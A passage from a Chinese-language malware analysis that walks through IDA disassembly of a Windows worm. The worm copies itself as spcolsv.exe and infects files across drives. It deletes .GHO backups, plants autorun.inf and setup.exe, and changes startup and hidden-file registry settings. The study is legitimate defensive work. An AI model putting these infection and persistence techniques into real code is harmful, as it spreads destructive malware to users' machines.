"spcolsv.exe" CODE:00408861 lea eax, [ebp+var_420] CODE:00408867 mov edx, 3 CODE:0040886C call sub_403F8C CODE:00408871 mov eax, [ebp+var_420] CODE:00408877 call sub_4040CC CODE:0040887C push eax ; lpCmdLine CODE:0040887D call WinExec CODE:00408882 xor eax, eax CODE:00408884 pop edx CODE:00408885 pop ecx CODE:00408886 pop ecx CODE:00408887 mov fs:[eax], edx CODE:0040888A jmp short loc_408896 CODE:0040888C ; --------------------------------------------------------------------------- CODE:0040888C CODE:0040888C loc_40888C: ; DATA XREF: sub_4082F8+4C5↑o CODE:0040888C jmp sub_403538 CODE:00408891 ; --------------------------------------------------------------------------- CODE:00408891 call sub_4036F0 CODE:00408896 CODE:00408896 loc_408896: ; CODE XREF: sub_4082F8+3F9↑j CODE:00408896 ; sub_4082F8+592↑j CODE:00408896 push 0 ; uExitCode CODE:00408898 call ExitProcess_0 CODE:0040889D ; --------------------------------------------------------------------------- CODE:0040889D CODE:0040889D loc_40889D: ; CODE XREF: sub_4082F8+2D6↑j CODE:0040889D mov edx, [ebp+var_8] CODE:004088A0 mov eax, offset dword_408934 ; 這裏的值爲1 CODE:004088A5 call sub_4041B4 CODE:004088AA test eax, eax CODE:004088AC jg loc_4085D3 ; 沒跳 CODE:004088B2 xor eax, eax CODE:004088B4 pop edx ; 這段清除了棧上的SEH,下面應該是退出代碼了,應該和程序邏輯沒有什麼關係 CODE:004088B5 pop ecx CODE:004088B6 pop ecx CODE:004088B7 mov fs:[eax], edx CODE:004088BA push offset loc_4088E4 CODE:004088BF
關鍵函數二
要執行到第二個關鍵函數,必須到system目錄下執行新建的spcolsv.exe了,因爲原程序在第一個關鍵函數的末尾執行WinExec之後就退出了
這個函數有3個功能,分別對應着3中感染方式
首先看第一個
首先會遍歷所有的驅動器
遍歷驅動器下的目錄,過濾掉特殊目錄,然後新建立Desktop_.ini文件,然後還會刪除.GHO文件
在一個文件遍歷結束之後,會跳到40953f處,重新遍歷文件,當文件類型是文件的時候,則會跳到409DC3去進行文件感染,文件感染的類型也有很多,不同類型的感染方式也不一樣,這裏就不具體分析了。
然後是第二種感染,創建的是定時器
定時器代碼在目錄下生成了autorun.inf和setup.exe文件,用以自動執行,和之前的感染代碼一樣
第3個函數和網絡相關
sub_40BCC8應該就是實際運行的函數
關鍵函數三
關鍵函數3設置4個定時器
設置開機啓動,不能顯示隱藏文件的註冊表更改
後面的之後再分析吧
當第一個sub_403C98函數被調用完之後
然後OD看一下這函數執行完之後的值情況,函數執行完之後沒有eax的操作,所以函數沒有返回值
看上述解密函數
開始代碼法分析,IDA的Options->String litera style可以更改字符串解碼方式,可以解析出edx是指向了字符串,然後調用了403C98,
CODE:0040D0F2 mov eax, offset dword_40F7D4 CODE:0040D0F7 mov edx, offset asc_40D1D8 ; "***武*漢*男*生*感*染*下*載*者***" CODE:0040D0FC call sub_403C98 ; 這個函數的參數有兩個 CODE:0040D0FC ; 1、eax CODE:0040D0FC ; 2、edx在調用處指向字符串
接着看403C98這個位置的函數,
CODE:00403C98 test edx, edx ;edx指向了字符串 CODE:00403C9A jz short loc_403CC0 ; 這裏應該是一個字符串爲空的檢查 CODE:00403C9C mov ecx, [edx-8] ;edx-8的位置值是-1 CODE:00403C9F inc ecx ;加1變爲0,zf標誌位置1 CODE:00403CA0 jg short loc_403CBC ;跳轉條件爲zf爲0,SF=AF,所以這裏不跳轉 CODE:00403CA2 push eax CODE:00403CA3 push edx CODE:00403CA4 mov eax, [edx-4] ;此時eax爲0x20h CODE:00403CA7 call sub_403D08 ; CODE:00403CAC mov edx, eax CODE:00403CAE pop eax CODE:00403CAF push edx CODE:00403CB0 mov ecx, [eax-4] CODE:00403CB3 call sub_402650 CODE:00403CB8 pop edx CODE:00403CB9 pop eax CODE:00403CBA jmp short loc_403CC0 ; 錯誤檢查代碼 CODE:00403CBC ; --------------------------------------------------------------------------- CODE:00403CBC CODE:00403CBC loc_403CBC: ; CODE XREF: sub_403C98+8↑j CODE:00403CBC lock inc dword ptr [edx-8] CODE:00403CC0 CODE:00403CC0 loc_403CC0: ; CODE XREF: sub_403C98+2↑j CODE:00403CC0 ; sub_403C98+22↑j CODE:00403CC0 xchg edx, [eax] ; 錯誤檢查代碼 CODE:00403CC2 test edx, edx CODE:00403CC4 jz short locret_403CDA CODE:00403CC6 mov ecx, [edx-8] CODE:00403CC9 dec ecx CODE:00403CCA jl short locret_403CDA CODE:00403CCC lock dec dword ptr [edx-8] CODE:00403CD0 jnz short locret_403CDA CODE:00403CD2 lea eax, [edx-8] CODE:00403CD5 call sub_402540 CODE:00403CDA CODE:00403CDA locret_403CDA: ; CODE XREF: sub_403C98+2C↑j CODE:00403CDA ; sub_403C98+32↑j ... CODE:00403CDA retn